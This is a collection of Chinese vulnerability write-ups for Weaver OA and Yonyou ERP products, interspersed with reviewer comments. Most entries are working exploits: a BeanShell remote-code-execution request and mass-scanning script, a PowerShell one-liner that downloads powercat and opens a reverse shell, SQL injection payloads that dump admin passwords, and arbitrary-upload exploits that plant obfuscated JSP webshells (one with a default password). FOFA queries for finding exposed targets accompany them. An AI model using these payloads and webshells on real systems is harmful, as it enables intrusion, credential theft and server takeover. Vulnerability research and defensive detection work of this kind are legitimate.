![image-20220209105047595](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091050654.png)
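Review bot: POC_1 encodes the patched behaviour as a string match on `无法验证您的身份`, but the prose never says what a fixed system returns; 漏洞复现 should state that a fixed build answers the `saveYZJFile` request with that authentication error, so re-testing has a criterion. The root cause, `downloadUrl` accepting a `file://` scheme and the stored result being readable through `/file/fileNoLogin/<id>` without login, is implied by the URLs but not written down; stating it makes the fix (scheme allowlist on `downloadUrl`, authentication on `fileNoLogin`) obvious. In the script, `id` shadows the Python builtin, `Content-Type: application/x-www-form-urlencoded` is set on GET requests that carry no body, and the `except` messages in POC_3 and POC_4 contain a stray `)` inside the string. 影响版本 gives `2018-2019 多个版本` with no build numbers. For detection: `downloadUrl=file:` in requests to `/wxjsapi/saveYZJFile`.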

@ -0,0 +1,122 @@
# 泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
## 漏洞描述
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重.
## FOFA
```
app=“泛微-协同办公OA”
```
## 影响版本
```
E-cology 7.0
E-cology 8.0
E-cology 8.1
E-cology 9.0
```
## 漏洞复现
直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/如下图在victim上执行了命令“whoami”
![image-20220209104639420](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091046499.png)
请求包为
```shell
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxxxxxxx:8088
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
bsh.script=ex\u0065c("cmd /c dir");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
```
**关于绕过**
```shell
eval%00("ex"%2b"ec(\"whoami\")");
ex\u0065c("cmd /c dir");
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd
```
## 漏洞POC
https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204
```python
#/usr/bin/python
#coding:utf-8
#Author:Ja0k
#For Weaver-Ecology-OA_RCE
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests,sys
headers = {
'Content-Type': 'text/xml; charset=utf-8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Cache-Control': 'max-age=0',
'Content-Type': 'application/x-www-form-urlencoded',
'Upgrade-Insecure-Requests': '1',
'Content-Length': '578'
}
proxies= {'http':'http://127.0.0.1:8080'}
def Poc_check(target):
Url_Payload1="/bsh.servlet.BshServlet"
Url_Payload2="/weaver/bsh.servlet.BshServlet"
Url_Payload3="/weaveroa/bsh.servlet.BshServlet"
Url_Payload4="/oa/bsh.servlet.BshServlet"
Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw"""
Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4):
url= target + Url_Payload
for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3):
try:
http_response = requests.post(url,data=Data_payload,headers=headers,verify=False)
#print http_response.status_code
if http_response.status_code == 200:
if ";</script>" not in (http_response.content):
if "Login.jsp" not in (http_response.content):
if "Error" not in (http_response.content):
print "{0} is a E-cologyOA_RCE Vulnerability".format(url)
print "Server Current Username{0}".format(http_response.content)
elif http_response.status_code == 500:
print "{0}500 maybe is Weaver-EcologyOAPlease confirm by yourself ".format(url)
else:
pass
except Exception,Error:
pass
if __name__ == '__main__':
for line in open(sys.argv[1]).readlines():
target=line.strip()
Poc_check(target)
```
```plain
#1.install python Dependencies Library
pip install requests
#2.批量脚本 执行
python Weaver-Ecology-OA_RCE-exp.py
url.txt文件中 是url地址 需要带http协议
```
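Review bot: the third line of the 关于绕过 block, the `IEX(New-Object System.Net.Webclient).DownloadString(...)` one-liner ending in `powercat -c ip -p 6666 -e cmd`, is a reverse-shell payload unrelated to demonstrating the BeanShell exposure and should be removed from a reference entry; the first two lines already show the evasion forms the text discusses. The FOFA query `app=“泛微-协同办公OA”` uses full-width quotes and will not match as written; the sibling entry has `app="泛微-协同办公OA"`. In the PoC, the `headers` dict literal declares `Content-Type` twice (Python keeps the last), and the code is Python 2 while the rest of the collection is Python 3; the usage block at the end refers to `url.txt` without saying it is `sys.argv[1]`. 漏洞描述 gives the patch date (2019-09-17) but no fixed version. For detection, any request to `bsh.servlet.BshServlet` carrying a `bsh.script` parameter is the indicator, since the text states the servlet should not be reachable without authorization.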

@ -0,0 +1,31 @@
# 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
## 漏洞描述
泛微 E-Office mysql_config.ini文件可直接访问泄漏数据库账号密码等信息
## 漏洞影响
```
泛微 E-Office
```
## FOFA
```
app="泛微-EOffice"
```
## 漏洞复现
产品页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048925.png)
验证POC
```php
/mysql_config.ini
```
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091048869.png)
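Review bot: the fence tagged `php` holds a URL path, not code; `plain` as in the other entries. 漏洞影响 names the product with no version, and 漏洞描述 does not state the fix, which is to keep `mysql_config.ini` outside the web root or deny direct access to `.ini` files in the server configuration. Successful (200) GETs for `/mysql_config.ini` are the detection signal.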

@ -0,0 +1,66 @@
# 泛微OA WorkflowCenterTreeData SQL注入漏洞
## 漏洞描述
2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的任意攻击者都可借SQL语句拼接时机注入恶意payload造成SQL注入攻击。
## 影响版本
```
使用Oracle数据库的泛微服务
```
## 漏洞复现
泛型微生态OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时由于内置sql语句分解不严密导致其存在的sql注入漏洞
![image-20220209103818614](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091038769.png)
漏洞请求包
```sql
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=test
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Upgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%
0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
```
## 漏洞POC
```python
import requests
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded'
}
def exploit(url):
target=url+'/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333'
payload="formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%
0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1"
res=requests.post(url=target,data=payload,headers=headers,timeout=10)
res.encoding=res.apparent_encoding
print(res.text)
if __name__ == '__main__':
url=sys.argv[1]
exploit(url)
```
## 参考文章
[泛微OA WorkflowCenterTreeData接口注入复现仅限oracle数据库](https://zhuanlan.zhihu.com/p/86082614)
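Review bot: `泛型微生态OA系统` at the start of 漏洞复现 is a mangled product name (泛微), and `sql语句分解不严密` should read `拼接` as 漏洞描述 puts it. The request fence is tagged `sql` for an HTTP request, and the `formids=` line is broken across two lines both in the request and inside the Python string literal at `payload=`, so copying either produces a body with an embedded newline; the entry should say whether that is intentional wrapping. `Content-Length: 2236` is fixed in the captured request and will not match an edited body. The text says the flaw is Oracle-specific (`v$parameter`) but 影响版本 gives no product version or fixed build. Detection: `formids` values containing `union select` or `v$parameter` on `/mobile/browser/WorkflowCenterTreeData.jsp`.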

File diff suppressed because one or more lines are too long

@ -0,0 +1,55 @@
# 泛微OA getdata.jsp SQL注入漏洞
## 漏洞描述
泛微OA V8 存在SQL注入漏洞攻击者可以通过漏洞获取管理员权限和服务器权限
## 漏洞影响
```
泛微OA V8
```
## FOFA
```
app="泛微-协同办公OA"
```
## 漏洞复现
在getdata.jsp中直接将request对象交给
**weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :**
方法处理
![image-20220209104257902](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091042978.png)
在getData方法中判断请求里cmd参数是否为空如果不为空调用proc方法
![image-20220209104319947](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043985.png)
Proc方法4个参数(“空字符串”,”cmd参数值”,request对象serverContext对象)
在proc方法中对cmd参数值进行判断当cmd值等于getSelectAllId时再从请求中获取sql和type两个参数值并将参数传递进getSelectAllIdssql,type方法中
![image-20220209104335191](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043319.png)
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=select password as id from userinfo;
即可完成对数据库操控
POC
```plain
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
```
查询HrmResourceManager表中的password字段页面中返回了数据库第一条记录的值sysadmin用户的password
![image-20220209104351654](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043694.png)解密后即可登录系统
![image-20220209104408461](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091044509.png)
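Review bot: the parameter string in the prose, `?cmd= getSelectAllId&sql=select password as id from userinfo;`, has a space after `cmd=` and queries `userinfo`, while the POC below it queries `HrmResourceManager` with no space; since the text says `proc` compares `cmd` for equality with `getSelectAllId`, the spaced form would not reach the vulnerable branch. Make the prose example match the POC. This entry also has no 参考文章 section, unlike its siblings; add the source of the code screenshots.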

View File

@ -0,0 +1,49 @@
# 泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞
## 漏洞描述
泛微OA sysinterface/codeEdit.jsp 页面任意文件上传导致可以上传恶意文件
## 漏洞版本
```
较老版本,目前无准确版本
```
## 漏洞复现
```
filename=******5308.java&filetype=javafilename为文件名称 为空时会自动创建一个
String fileid = "Ewv";<br>
String readonly = "";<br>
boolean isCreate = false;<br>
if(StringHelper.isEmpty(fileName)) {<br>
Date ndate = new Date();<br>
SimpleDateFormat sf = new SimpleDateFormat("yyyyMMddHHmmss");<br>
String datetime = sf.format(ndate);<br>
fileid = fileid + datetime;<br>
fileName= fileid + "." + filetype;<br>
isCreate = true;<br>
} else {<br>
int pointIndex = fileName.indexOf(".");<br>
if(pointIndex > -1) {<br>
fileid = fileName.substring(0,pointIndex);<br>
}}
```
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045304.png)
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045317.png)
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045310.png)
![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045312.png)
![5](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091045316.png)
## 参考文章
[泛微OA未授权可导致GetShell](https://www.uedbox.com/post/15730/)
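Review bot: the fenced block is a Java excerpt with a literal `<br>` on every line and the parameter explanation `filename=******5308.java&filetype=java，filename为文件名称 为空时会自动创建一个` merged into its first line; drop the `<br>` tags, move the explanation above the fence and tag the fence `java` so it renders as the code it is. The five screenshots carry the actual upload steps with no text at all; a sentence per step (which endpoint, which parameters, where the file lands) is needed for anyone who cannot read the images.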

View File

@ -0,0 +1,71 @@
# 泛微OA uploadOperation.jsp 任意文件上传
## 漏洞描述
```
泛微OA V9 存在文件上传接口导致任意文件上传
```
## 漏洞影响
```
泛微OA V9
```
## 漏洞复现
漏洞位于: /page/exportImport/uploadOperation.jsp文件中
Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈
重点关注File file=new File(savepath+filename),
Filename参数,是前台可控的,并且没有做任何过滤限制
![image-20220209104105593](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091041790.png)
利用非常简单,只要对着
/page/exportImport/uploadOperation.jsp
来一个multipartRequest就可以
![image-20220209104135755](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091041826.png)
然后请求 然后请求路径:
page/exportImport/fileTransfer/1.jsp
![image-20220209104201442](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091042495.png)
请求包
```bash
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 397
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
dnt: 1
x-forwarded-for: 127.0.0.1
Connection: close
------WebKitFormBoundary6XgyjB6SeCArD3Hc
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundary6XgyjB6SeCArD3Hc--
```
地址: /page/exportImport/fileTransfer/test.jsp
默认密码 rebeyond
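Review bot: the access path is given twice with different file names, `page/exportImport/fileTransfer/1.jsp` in the walkthrough and `/page/exportImport/fileTransfer/test.jsp` after the request, while the request itself uploads `test.jsp`; pick one. The duplicated phrase `然后请求 然后请求路径:` and the aside `啊哈哈哈哈哈` should go. Also, the request carries `x-forwarded-for: 127.0.0.1`; if the endpoint checks the source address, say so, otherwise remove the header so readers do not assume it is required.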

View File

@ -0,0 +1,110 @@
# 泛微OA weaver.common.Ctrl 任意文件上传漏洞
## 漏洞描述
泛微OA weaver.common.Ctrl 存在任意文件上传漏洞攻击者通过漏洞可以上传webshell文件控制服务器
## 漏洞影响
```
泛微OA
```
## FOFA
```
app="泛微-协同办公OA"
```
## 漏洞复现
存在漏洞的路径为
```plain
/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp
```
请求包为
![image-20220209103936690](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091039784.png)
使用POC文件上传
![image-20220209103951582](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091039689.png)
## 漏洞POC
```python
import zipfile
import random
import sys
import requests
def generate_random_str(randomlength=16):
random_str = ''
base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
length = len(base_str) - 1
for i in range(randomlength):
random_str += base_str[random.randint(0, length)]
return random_str
mm = generate_random_str(8)
webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1
def file_zip():
shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
Object[]{}), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("
<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
""" ## 替换shell内容
zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
zf.writestr(webshell_name2, shell)
def GetShell(urllist):
file_zip()
print('上传文件中')
urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
requests.post(url=urls,files=file,timeout=60, verify=False)
GetShellurl = urllist+'/cloudstore/'+webshell_name1
GetShelllist = requests.get(url = GetShellurl)
if GetShelllist.status_code == 200:
print('利用成功webshell地址为:'+GetShellurl)
else:
print('未找到webshell利用失败')
def main():
if (len(sys.argv) == 2):
url = sys.argv[1]
GetShell(url)
else:
print("python3 poc.py http://xx.xx.xx.xx")
if __name__ == '__main__':
main()
```
## 参考文章
[原漏洞公开地址](https://github.com/GTX8090TI/GTX8090TI.github.io/blob/6dd04a19bbc4fcef436e0b2f05c15bc98ac0c852/2021/05/02/泛微OA-前台GetShell复现/index.html)
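Review bot: `file_zip()` never closes the `ZipFile` it creates, so the central directory is only written if the object happens to be garbage-collected before `open(mm + '.zip', 'rb')` runs; use `with zipfile.ZipFile(...) as zf:` (or call `zf.close()`) so the archive is complete when it is posted. The success test `GetShelllist.status_code == 200` will also report success on any server that answers 200 for unknown paths; request the shell with a `cmd` parameter (the JSP only acts when `cmd` is present) and look for the `<pre>` block in the body instead. Minor: `verify=False` is set on the POST but not on the GET, and `base_str` repeats `G` where `J` was meant.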

View File

@ -0,0 +1,31 @@
# 用友 ERP-NC NCFindWeb 目录遍历漏洞
## 漏洞描述
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
## 漏洞影响
```
用友ERP-NC
```
## FOFA
```
app="用友-UFIDA-NC"
```
## 漏洞复现
POC为
```plain
/NCFindWeb?service=IPreAlertConfigService&filename=
```
![yongyou-8-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-1.png)
查看 ncwslogin.jsp 文件
![yongyou-8-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-8-2.png)
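Review bot: the POC `/NCFindWeb?service=IPreAlertConfigService&filename=` ends with an empty `filename`; the text should say what an empty value does (a directory listing, if that is what the first screenshot shows) and that a relative path such as `ncwslogin.jsp`, mentioned next, reads that file. Without that sentence the reader cannot tell whether the trailing `=` is a typo.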

View File

@ -0,0 +1,234 @@
# 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
## 漏洞描述
用友GRP-u8存在XXE漏洞该漏洞源于应用程序解析XML输入时没有进制外部实体的加载导致可加载外部SQL语句以及命令执行
## 影响版本
```
用友GRP-U8行政事业内控管理软件新政府会计制度专版
```
## FOFA
```
title="用友GRP-U8行政事业内控管理软件"
```
## 漏洞复现
漏洞利用POC请求包
```xml
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
```
请求后按F12查看源代码可以得到SQL语句查询结果
![yongyou-7-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-1.png)
![yongyou-7-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-2.png)
也可以调用 **xp_cmdshell** 来执行系统命令(大部分此系统为**windows**)
